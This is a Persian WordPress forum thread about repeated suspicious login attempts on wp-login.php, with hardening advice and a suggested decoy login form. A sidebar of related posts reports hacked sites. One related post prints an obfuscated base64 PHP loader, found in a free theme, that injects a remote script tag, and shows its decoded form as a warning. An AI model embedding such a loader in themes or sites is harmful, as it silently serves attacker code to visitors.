ARS

ورودهای مشکوک به wp-login.php

10 پست در این موضوع قرار دارد

درود

دوستان از دیروز هرموقع آخرین بازدیدکنندگان رو تو افزونه ی آمار نگاه میکنم یه چندتا ورودی با آیپی های مختلف به آدرس wp-login.php وجود داره!!!

یعنی در تلاش برای هک کردن سایت ما هستند یا...!؟؟؟

نمی دونم لازمه کار خاصی انجام بدم؟؟

البته کلیه پیشنهادهای امنیتی رو انجام دادم!!

به اشتراک گذاری این پست

لینک به پست

سلام

ای پی خودتون متغیر (دینامیک) نیست ؟

رنج و محدوده ای پی ها نزدیک به همه ؟

به اشتراک گذاری این پست

لینک به پست

ipها رو بررسی کنید مربوط به رباتها نباشد

در سایت لینکی به این صفحه دارید؟

به اشتراک گذاری این پست

لینک به پست

سلام

ای پی خودتون متغیر (دینامیک) نیست ؟

رنج و محدوده ای پی ها نزدیک به همه ؟

آیپی خودم متغیره ولی میدونم آیپی خودم نیست!

رنج آیپی ها هم نزدیک به هم نیست یه چندتاش:

209.40.202.68

178.208.91.196

50.97.141.98

ipها رو بررسی کنید مربوط به رباتها نباشد

در سایت لینکی به این صفحه دارید؟

در سایت هیچ لینکی به این صفحه نیست!

آیپی ها هم فک نکنم برای رباط ها باشن!!

به اشتراک گذاری این پست

لینک به پست

دوستان هنوز مشکل برطرف نشده!

نظر خاصی ندارید!!!؟

به اشتراک گذاری این پست

لینک به پست

احتمالا مربوط به رباتها است

در سایت زیر ip را بررسی کنید

http://ip-lookup.net

توصیه های امنیتی را بکار ببرید و نگران این چیزا نباشید

چندان مهم نیست

به اشتراک گذاری این پست

لینک به پست

این نوع حمله های سرگردون نرم افزاری هستند (اغلب) اصولا بعیده یک هکر تلاش کنه از طریق صفحه لاگ این وردپرس یک سایت معمولی رو که قاعدتا چیزی برای سرقت نداره هک کنه

برای هک وردپرس منفذ هایی رو پیدا می کنند که لاگ این رو بشه باهاش دور زد و وارد ادمین شد اون هم با اهداف مشخص

نام کاربری ادمین را admin یا administraror نگذارید چک کنید از تنظیمات وردپرس اجازه ثبت نام اگر باز بود ثبت نام را ببندید حتی اگر سایت عضو پذیری هستید یک روز حداقل جلو ثبت نام را ببندید و رمزتون رو در 24 ساعت آینده دو سه بار تغییر بدید و در رمزهاتون از کارکترهای !@#$%^&*~ استفاده کنید و اگر رمزتون رو می خواهید روی سیستمتون ذخیره کنید مثلا از آخر به اول بنویسید یا به همه عددها یک عدد مشخص اضافه کنید که فقط خودتون سردربیارید

معمولا نرم افزارهای فرم شناس تبلیغاتی این تلاش ها را برای راهیابی به مکانهایی که امکان عضویت داره برای ارسال اسپم هاشون می کنند

به اشتراک گذاری این پست

لینک به پست

دوستان پیشنهادی برای جلوگیری از این ورودی ها ندارند؟؟؟

از دیروز تا حالا بیش از 1000 تا ورودی به wp-login.php داشتم!!!!

به اشتراک گذاری این پست

لینک به پست

اگر کاربر دیگه ایی بجز خودتون ندارید موقتا فایل رو تغییر نام بدید ببینید چه اتفاقی میوفته

به اشتراک گذاری این پست

لینک به پست

خوب یک پیشنهاد دارم.

شما یک فرم بسازید با ورودیهایی که شبیه فرم لاگین هست (یوزر) و اطلاعات ورودی توی فرم رو به جای دیگه ای بفرستید. یه نمونه فرم بود که اطلاعات ورودی فرم توی یک فایل روی سرور ثبت میشد. اینجوری در واقع یک فیک پیج ساختید و میتونید ببینید این ورودیها چه چیزهایی رو توی فرم ثبت میکنند.

به اشتراک گذاری این پست

لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

• مطالب مشابه

• توسط admintory
      سلام
      صورت مسئله:
      روی یک هاست چندین سایت دارم. امروز برای یکیشون متوجه اعمال خرابکاری شدم.
      آدرس سایت مورد نظر: http://golbahardaneh.com
      این سایت بعد لود فایل های js ریدایرکت میشه روی یک آی پی نامربوط. آدرس هدف: http://134.249.116.78/jquery.js
      هیچ بک آپی از قبل ندارم.
      کاری که من کردم:
      1- از فایل ها و دیتابیس فعلی بک آپ گرفتم.
      2- افزونه امنیتی WordFence رو نصب کردم و سایت رو اسکن کردم. نتیجه اسکن تایید آلوده بودن حدود 400 فایل js به کد مخرب بود.
      3- از طریق این لینک   https://www.polaris64.net/blog/cyber-security/2017/wordpress-hacks-jquery-js-script-injection  کد مخرب رو پیدا کردم و جاش یه کد جایگزین رو در همه فایلها گذاشتم.
      4- توی htaccess آدرس هدف رو بن کردم.
      5- توی یه سایت اسکنر امنیتی معروف سایت رو اسکن کردم (SUCURI SITE) که چند تا هشدار Maleware به من داد. ولی چیزی نفهمیدم ازش
      6- وردپرس و پلاگین ها رو آپدیت کردم.

ولی هنوز مشکل حل نشده. لطفا کمک کنید.
      نکته: ریدایرکت فقط برای صفحه اصلی سایته و صفحات داخلی با وارد کردن مستقیم آدرس صفحه لود میشن. مثل http://golbahardaneh.com/business-model
    • توسط محمدرضا فتحی
      چند روزی هست که وقتی گزارش گوگل آنالیتیک رو نگاه میکنم و میخوام چک کنم ببینم کدوم یکی از پیج های وبسایتم بیشتر بازدید شده با یک url مربوط به وبسایت reddit.com مواجه میشم. امکانش هست این وبسایت، سایت من رو هک کرده باشه و وقتی کاربرای اینترنت توی سایت من هستن ریدایرکتشون کنه توی سایت خودش؟
      اگر حدسم درسته لطفا راهنمایی کنید چطور باید جلوش رو بگیرم و اگر اشتباهه پس چرا گوگل آنالیتیک این url رو جزء پیج های نمایش داده شده وبسایت من بهم نشون میده؟
      این آدرس کاملی هست که گوگل آنالیتیک بهم نشون میده:
      www.reddit.com/r/technology/comments/5foynf/lifehac%C4%B8ercom_original_idn_fake_safe_best_on_ff/
    • توسط mojtabashahi
      امروز قصد دارم دو ضرب المثل را که از "گربه" استفاده کرده اند برای شما یادآوری نمایم. و یک هشدار به کاربران "تازه وارد" وردپرس بدهم.
      1 . گربه را دم حجله باید کشت. سایت : www.dorcel.ir ، باید همین اول جلوی فعالیت چنین سایت هایی گرفته شود.
      2 . هیچ گربه ای محض رضای خدا موش نمی گیرد. داخل فایل های یکی از پوسته هایی که رایگان برای دانلود قرار داده شده کد (انکد base64) زیر وجود دارد : 
      <?php $str = 'PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIHNyYz0naHR0cDovL2JveC5kb3JjZWwuaXIvZG9yY2VsLnBocCc+PC9zY3JpcHQ+'; echo base64_decode($str); که بعد از دیکد می شود : 
      <script type='text/javascript' src='http://box.dorcel.ir/dorcel.php'>  
      پ.ن : ....
    • توسط m2ostafa
      سلام من  سایتم ۲ بار  هک شده بود بخاطر همین یسری فایل های مخرب توش دیده بودم و سعی کردم پاک کنم.یبار کامل سایت رفت پایین و مجبور به ریکاوری شدیم.الان سایت بالاست اما خیلی هنوز فایل های مخرب توش تکثیر میشه اونقدر که دیگه الان هاست ۱ گیگم پر شده در صورتی که ۳۰۰ مگ دیتا بیشتر ندارم.کسی می تونه کمکم کنه بگه چجوری فایل هارو پیدا کنم؟
    • توسط loveali
      با سلام
      یه چند وقتیه که وقتی کسی برای اولین بار (از طریق موتور جست و جو -گوگل) سایت رو باز می کنه پیغام زیر رو که براتون اتچ کردم نمایش می ده
      dr-narmaki.com
      یه چند تا کد مشکوک هم دیدم تو فایل header که پاک کردم
      اول فک می کردم سرویس cloudflade که دیدم تو فروم های خارجی این کار رو می کنن که ادمین سایت رو گول بزنن و می گفتن سایتشون hijacking مرورگر شده
      به نظرتون چیکار می تونم بکنم؟
      باتشکر